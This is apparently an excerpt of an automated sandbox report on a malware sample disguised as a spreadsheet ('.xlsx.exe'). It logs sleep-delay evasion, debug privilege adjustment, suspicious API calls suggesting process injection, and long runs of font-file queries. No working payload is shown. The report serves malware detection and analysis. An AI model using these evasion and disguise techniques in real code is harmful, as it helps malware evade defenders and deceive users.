                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -595171s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -595062s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -594951s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -594843s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -594734s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -594624s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -594515s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 30000
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4129215635.00000000007D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Code function: 1_2_060E9548 LdrInitializeThunk,1_2_060E9548
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: 0.2.DC74433Y7889021.xlsx.exe.2d3a538.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                    Source: 0.2.DC74433Y7889021.xlsx.exe.2d3a538.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Process created: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe"
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
